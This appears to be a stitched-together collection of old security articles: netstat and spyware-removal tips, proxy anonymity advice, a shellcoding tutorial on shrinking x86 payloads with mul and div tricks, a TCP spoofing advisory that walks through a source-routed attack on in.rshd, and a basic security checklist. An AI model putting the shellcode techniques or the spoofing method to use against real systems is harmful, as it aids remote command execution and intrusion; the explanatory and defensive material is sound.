What can you do? Well some anti-virus software will detect some trojans.Another (tedious) thing is to start each of these "extra" Internet programsone at a time and go through the last two steps above, looking at the routesand connection the program uses. However, the tricky part will be figuringout where to tracert to in order to find out if the addresses you see instep 2 are "safe" or not. I should forewarn you, that running tracert aftertracert, after tracert might be considered "improper" by your ISP. The stepsoutlined above may not work exactly as I have stated depending upon your ISP,but with a true ISP it should work. Finally, this advise comes with NOwarranty and by following my "hints' you implicitly release me from ANY andALL liability which you may incur.

Other options
Display protocol statistics and current TCP/IP network connections.

Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]
-a.. Display all connections and listening ports.

-e.. Display Ethernet statistics. This may be combined with the -s option,

-n.. Diplays address and port numbers in the numerical form.

-p proto..Shows connections for the protocol specified by proto; proto may beTCP or UDP. If used with the -s option to display per-protocol statistics,proto may be TCP, UDP, of IP.

-r.. Display the routing table.-s.. Display per-protocol statistics. By default, statistics are shown for TCPUDP and IP; the -p option may be used to specify a subset of the defaultinterval..Redisplay selected statistics, pausing intervals seconds between eachdisplay. If omitted. netstat will print the current configuration information once.

All You Got To Know About Spyware

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those daddy baddies.

What is spy-ware?

Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares.

There are thousands out there, new ones are added to the list everyday. But here are a few:Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?

The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: hxxp://www.spywareguide.com/product_search.php

***replace hxxp with http***

If you would like to block pop-ups (IE Pop-ups).

There are tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (hxxp://toolbar.google.com/) This program is Free.

Try: AdMuncher (hxxp://www.admuncher.com) This program is Shareware.

If you want to remove the "spyware" try these.

Try: Lavasoft Ad-Aware (hxxp://www.lavasoftusa.com/) This program is Free. Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (hxxp://www.safer-networking.org/) This program is Free.

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (wxw.bulletproofsoft.com/spyware-remover.html) This program is a Shareware.

Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2. (wxw.webroot.com/wb/products/spysweeper/index.php) This program is Shareware.

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.The best scanner out there, and updated all the time.

Try: SpywareGuard 2.2. (hxxp://www.wilderssecurity.net/spywareguard.html) This program is Free.

Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

More Information about "spyware".

Check these sites.

hxxp://www.spychecker.com/

hxxp://www.spywareguide.com/

hxxp://www.cexx.org/adware.html

hxxp://www.theinfomaniac.net/infomaniac/co...rsSpywares.html

hxxp://www.thiefware.com/links/

hxxp://simplythebest.net/info/spyware.html

BE FREE FROM SPYWARE......HAPPY BROWSING

Complete Anonymity

I can see you hiding in the shadows over there and so can the logs of all the web sites, FTP servers and other nooks and crannies you visit on the web. The sort of information gathered by these logs and which is available to the webmasters of the sites you visit include the address of the previous site you visited, your IP address, your computer's ID name, your physical location and the name of your ISP along with less personal details such as the operating system you're using and your screen resolution. If someone was snooping through your dustbin to gather information on consumer trends or tracking your every move to see where it is you go everyday you wouldn't be too chuffed would you. Well the web is no different, it's still an invasion of privacy and a threat to security and you don't have to put up with it.

Proxy servers:

Every time you visit a web site, detailed information about your system is automatically provided to the webmaster. This information can be used by hackers to exploit your computer or can be forwarded to the market research departments of consumer corporations who by tracking your activities on the internet are better equipped to direct more relevant spam at you. Your best defense against this is to use what is known as a proxy server, which will hide revealing information from the web sites you visit, allowing you to surf the web
anonymously. These work by altering the way in which your browser retrieves web pages or connects to remote servers. With a proxy server set up, whenever you 'ask' IE or Netscape to look at a web page, the request is first sent through an external server which is completely independent of your ISP's servers. This third party server then does the requesting on your behalf so that it appears that the request came from them rather than you and your real IP address is never disclosed to the sites you visit. There is nothing to download and the whole process takes less than a minute.

There are two different ways to use proxy servers and both have their advantages and disadvantages. The first method is to use a web based service. What this involves is visiting the proxy's home page each time you want to browse a web site anonymously. The core component of such a system is the dialog box where you enter the address of the web site you want to visit. Each time you enter the URL of the site you want to browse via the proxy into this box, your personal information, IP address and so on is first encrypted before being sent to the site allowing you to maintain your anonymity.

Two of the best examples of this type of web based proxy service are;

hxxp://www.rewebber.com

hxxp://www.anonymizer.com

***replace hxxp with http***

Obviously one disadvantage of using a web based service like Rewebber or Anonymizer, however, is that you have to visit the proxies home page each time you want to surf anonymously. You could choose to select this page as your default home page, but it's still quite awkward if you're forever site hopping at the speed of light. The second main 'con' is that you often have to put up with extra adverts on the pages you visit. These are automatically inserted into the
pages by the proxy - they have to pay for service somehow. More sophisticated and convenient solutions are also on offer yet they come with a price tag.

The second method you can use to protect privacy via a proxy server involves adjusting the settings of your web browser so that you can surf anonymously
without having to visit the home page of your proxy each time. To do this you will first need to know the name of your proxy server and the port number it uses.
This information can be gleaned from either a public proxy server list or the FAQ referring to a private subscription based service. Once you have the name of the
proxy server you wish to use, select 'Internet Options' from the 'Tools' menu of your browser. Now select 'Connections' followed by 'Settings' and tick the 'use a proxy server' check box. To finish the job all you have to do now is enter the name of the server in the 'address' box, the port which it uses in the 'port' box
and go forth and surf anonymously.

Free, manual proxy servers as advertised on anonymity sites, if you can find one at all, are likely to be highly oversubscribed, and as a result the speed at which
they retrieve web pages can deteriorate. In which case you can go in pursuit of a public proxy server list and select an alternative from it, which can then be set up manually.

To locate such a list you can investigate sites such as;

hxxp://www.proxys4all.com

BE ANONYMOUS

Advanced Shell Coding Techniques

Introduction

This paper assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehearse these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The Multiplicity Of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and it's purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself. mul performs an unsigned multiply of two integers. It takes only one operand, the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

movl $0x0a,%eax
mul $0x0a

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode?

Well, let's think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication. Let's put on our maths hats for a second, and consider this, what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it 0's out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it's operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However that's not all, %edx is 0'd now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.

The div Instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax.

So...how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit.

A Simple TCP Spoofing Attack

A Simple TCP Spoofing Attack.

Over the past few years TCP sequence number prediction attacks have become a real threat against unprotected networks. TCP sequence number prediction attacks have most commonly been implemented by opening a series of connections to the target host, and attempting to predict the sequence number which will be used next. Many operating systems have therefore attempted to solve this problem by implementing a method of generating sequence numbers in unpredictable fashions. This method does not solve the problem. This advisory introduces an alternative method of obtaining the initial sequence number from some common trusted services.

The attack presented here does not require the attacker to open multiple connections, or flood a port on the trusted host to complete the attack. The only requirement is that source routed packets can be injected into the target network with fake source addresses.This advisory assumes that the reader already has an understanding of how TCP sequence number prediction attacks are implemented. The impact of this advisory is greatly diminished due to the large number of organizations which block source routed packets and packets with addresses inside of their networks. Therefore we present the information as more of a 'heads up' message for the technically inclined, and to re-iterate that the randomization of TCP sequence numbers is not an effective solution against this attack.

Technical Details

The problem occurs when particular network daemons accept connections with source routing enabled, and proceed to disable any source routing options on the connection. The connection is allowed to continue, however the reverse route is no longer used. An example attack can launched against the in.rshd daemon, which on most systems will retrieve the socket options via getsockopt and then turn off any dangerous options via setsockopt.
An example attack follows. Host A is the trusted host Host B is the target host Host C is the attacker Host C initiates a source routed connection to in.rshd on Host B, pretending to be Host A. Host C spoofing Host A --> Host B in.rshd Host B receives the initial SYN packet, creates a new PCB (protocol control block) and associates the route with the PCB. Host B responds, using the reverse route, sending back a SYN/ACK with the sequence number. Host C spoofing Host A <-- Host B in.rshd Host C responds, still spoofing host A, acknowledging the sequence number. Source routing options are not required on this packet.
Host C spoofing Host A --> Host B in.rshd We now have an established connection, the accept call completes, and control is now passed to the in.rshd daemon. The daemon now does IP options checking and determines that we have initiated a source routed connection. The daemon now turns off this option, and any packets sent thereafter will be sent to the real Host A, no longer using the reverse route which we have specified. Normally this would be safe, however the attacking host now knows what the next sequence number will be. Knowing this sequence number, we can now send a spoofed packet without the source routing options enabled, pretending to originate from Host A, and our command will be executed. In some conditions the flooding of a port on the real host A is required if larger ammounts of data are sent, to prevent the real Host A from responding with an RST. This is not required in most cases when performing this attack against in.rshd due to the small ammount of data transmitted. It should be noted that the sequence number is obtained before accept has returned and that this cannot be prevented without turning off source routing in the kernel. As a side note, we're very lucky that TCP only associates a source route with a PCB when the initial SYN is received. If it accepted and changed the IP options at any point during a connection, more exotic attacks may be possible. These could include hijacking connections across the internet without playing a man in the middle attack and being able to bypass IP options checking imposed by daemons using getsockopt. Luckily BSD based TCP/IP stacks will not do this, however it would be interesting to examine other implementations.

Impact

The impact of this attack is similar to the more complex TCP sequence number prediction attack, yet it involves fewer steps, and does not require us to 'guess' the sequence number. This allows an attacker to execute arbitrary commands as root, depending on the configuration of the target system. It is required that trust is present here, as an example, the use of .rhosts or hosts.equiv files.

10 Fast & Free Security Enhancements

10 Fast and Free Security Enhancements

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly at the site (microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (www.sygate.com) and ZoneAlarm (www.zonelabs.com) offer free versions.


3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try Grisoft AVG Free Edition grisoft.com) and double check your Anti-virus with the free, online-only scanners available at pandasoftware.com/activescan and trendmicro.com.

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don't assume that e-mail "From:" a particular person is actually from that person until you have further reason to believe it's that person. Don't assume that an attachment is what it says it is. Don't give out your password to anyone, even if that person claims to be from "support."

BE SAFE